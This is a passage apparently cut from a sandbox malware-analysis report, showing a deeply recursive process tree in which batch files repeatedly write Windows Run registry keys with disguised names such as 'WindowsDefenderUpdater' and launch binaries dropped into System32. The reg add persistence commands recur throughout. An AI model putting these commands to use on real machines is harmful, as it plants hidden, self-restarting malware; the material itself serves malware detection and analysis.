PID:1580 -
C:\Windows\system32\timeout.exetimeout 137⤵PID:764
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f37⤵PID:2388
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f37⤵PID:932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f37⤵PID:2116
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f37⤵PID:848
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"37⤵PID:2628
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"38⤵PID:3068
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"37⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"37⤵PID:2932
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\162F.tmp\1630.tmp\1631.bat C:\Windows\system32\java.exe"38⤵
- Drops file in System32 directory
PID:2728 -
C:\Windows\system32\timeout.exetimeout 139⤵PID:992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f39⤵PID:1912
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f39⤵PID:892
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f39⤵PID:2292
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f39⤵PID:1260
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"39⤵PID:2600
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"40⤵PID:684
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"39⤵
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"39⤵PID:3036
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\1A26.tmp\1A27.bat C:\Windows\system32\java.exe"40⤵PID:1848
-
C:\Windows\system32\timeout.exetimeout 141⤵PID:1360
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f41⤵PID:1912
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f41⤵
- Adds Run key to start application
PID:1976
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f41⤵PID:892
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f41⤵PID:2376
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"41⤵PID:1252
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"42⤵PID:2136
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"41⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"41⤵PID:1260
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1E1B.tmp\1E1C.tmp\1E1D.bat C:\Windows\system32\java.exe"42⤵
- Drops file in System32 directory
PID:2776 -
C:\Windows\system32\timeout.exetimeout 143⤵
- Delays execution with timeout.exe
PID:336
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f43⤵PID:912
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f43⤵PID:764
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f43⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f43⤵PID:2904
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"43⤵PID:2484
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"44⤵PID:808
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"43⤵
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"43⤵PID:3060
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2221.tmp\2222.tmp\2223.bat C:\Windows\system32\java.exe"44⤵
- Drops file in System32 directory
PID:1224 -
C:\Windows\system32\timeout.exetimeout 145⤵
- Delays execution with timeout.exe
PID:1912
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f45⤵
- Adds Run key to start application
PID:1644
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f45⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f45⤵
- Adds Run key to start application
PID:2904
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f45⤵
- Adds Run key to start application
PID:2720
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"45⤵PID:3000
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"46⤵PID:2940
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"45⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"45⤵PID:1356
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\25F8.tmp\25F9.tmp\25FA.bat C:\Windows\system32\java.exe"46⤵
- Drops file in System32 directory
PID:1416 -
C:\Windows\system32\timeout.exetimeout 147⤵
- Delays execution with timeout.exe
PID:2908
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f47⤵PID:764
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f47⤵PID:1672
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f47⤵PID:2696
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f47⤵
- Adds Run key to start application
PID:2056
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"47⤵PID:1440
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"48⤵PID:2792
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"47⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"47⤵PID:1912
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\29EE.tmp\29EF.tmp\29F0.bat C:\Windows\system32\java.exe"48⤵
- Drops file in System32 directory
PID:1980 -
C:\Windows\system32\timeout.exetimeout 149⤵PID:1700
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f49⤵
- Adds Run key to start application
PID:2044
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f49⤵PID:2544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f49⤵PID:2184
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f49⤵PID:2784
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"49⤵PID:1580
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"50⤵PID:528
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"49⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"49⤵PID:2308
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DD4.tmp\2DD5.tmp\2DD6.bat C:\Windows\system32\java.exe"50⤵
- Drops file in System32 directory
PID:1444 -
C:\Windows\system32\timeout.exetimeout 151⤵PID:2932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f51⤵PID:2760
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f51⤵PID:1048
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f51⤵PID:1324
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f51⤵PID:2584
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"51⤵PID:1616
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"52⤵PID:1788
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"51⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"51⤵PID:2244
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\31DB.tmp\31DC.bat C:\Windows\system32\java.exe"52⤵
- Drops file in System32 directory
PID:3064 -
C:\Windows\system32\timeout.exetimeout 153⤵
- Delays execution with timeout.exe
PID:2084
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f53⤵PID:444
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f53⤵PID:2544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f53⤵PID:2564
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f53⤵
- Adds Run key to start application
PID:2044
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"53⤵PID:1892
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"54⤵PID:588
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"53⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"53⤵PID:2784
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3582.tmp\3583.tmp\3584.bat C:\Windows\system32\java.exe"54⤵
- Drops file in System32 directory
PID:2580 -
C:\Windows\system32\timeout.exetimeout 155⤵PID:1260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f55⤵PID:1560
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f55⤵
- Adds Run key to start application
PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f55⤵PID:1700
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f55⤵PID:2608
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"55⤵PID:2824
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"56⤵PID:3236
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"55⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"55⤵PID:1536
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3949.tmp\394A.tmp\394B.bat C:\Windows\system32\java.exe"56⤵PID:3256
-
C:\Windows\system32\timeout.exetimeout 157⤵
- Delays execution with timeout.exe
PID:3288
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f57⤵
- Adds Run key to start application
PID:3320
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f57⤵PID:3328
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f57⤵PID:3336
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f57⤵PID:3344
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"57⤵PID:3352
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"58⤵PID:3656
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"57⤵
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"57⤵PID:3368
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3D5E.tmp\3D5F.tmp\3D60.bat C:\Windows\system32\java.exe"58⤵
- Drops file in System32 directory
PID:3680 -
C:\Windows\system32\timeout.exetimeout 159⤵
- Delays execution with timeout.exe
PID:3704
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f59⤵PID:3736
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f59⤵PID:3744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f59⤵PID:3752
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f59⤵
- Adds Run key to start application
PID:3760
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"59⤵PID:3768
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"60⤵PID:2376
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"59⤵
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"59⤵PID:3784
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4183.tmp\4184.tmp\4185.bat C:\Windows\system32\java.exe"60⤵
- Drops file in System32 directory
PID:3988 -
C:\Windows\system32\timeout.exetimeout 161⤵PID:4068
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f61⤵PID:1572
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f61⤵PID:3244
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f61⤵PID:3252
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f61⤵PID:2908
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"61⤵PID:700
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"62⤵PID:3408
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"61⤵
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"61⤵PID:2232
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\451B.tmp\451C.tmp\451D.bat C:\Windows\system32\java.exe"62⤵PID:3304
-
C:\Windows\system32\timeout.exetimeout 163⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f63⤵PID:3456
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f63⤵PID:3452
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f63⤵PID:3668
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f63⤵PID:3464
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"63⤵PID:3472
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"64⤵PID:3836
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"63⤵
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"63⤵PID:3488
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\48E2.tmp\48E3.tmp\48E4.bat C:\Windows\system32\java.exe"64⤵
- Drops file in System32 directory
PID:3596 -
C:\Windows\system32\timeout.exetimeout 165⤵
- Delays execution with timeout.exe
PID:3840
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f65⤵
- Adds Run key to start application
PID:3864
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f65⤵PID:3856
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f65⤵PID:3972
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f65⤵PID:3960
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"65⤵PID:3952
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"66⤵PID:3080
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"65⤵
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"65⤵PID:3940
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CE8.tmp\4CE9.tmp\4CEA.bat C:\Windows\system32\java.exe"66⤵PID:3148
-
C:\Windows\system32\timeout.exetimeout 167⤵
- Delays execution with timeout.exe
PID:3120
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f67⤵PID:2932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f67⤵PID:3228
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f67⤵PID:3220
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f67⤵PID:3212
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"67⤵PID:3208
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"68⤵PID:3552
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"67⤵
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"67⤵PID:3192
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50DE.tmp\50DF.tmp\50E0.bat C:\Windows\system32\java.exe"68⤵PID:2676
-
C:\Windows\system32\timeout.exetimeout 169⤵PID:3616
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f69⤵PID:3396
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f69⤵
- Adds Run key to start application
PID:3716
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f69⤵PID:3724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f69⤵PID:3732
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"69⤵PID:2516
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"70⤵PID:4044
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"69⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"69⤵PID:900
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\54D4.tmp\54D5.tmp\54D6.bat C:\Windows\system32\java.exe"70⤵PID:3504
-
C:\Windows\system32\timeout.exetimeout 171⤵PID:2956
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f71⤵
- Adds Run key to start application
PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f71⤵PID:932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f71⤵PID:1444
-
-
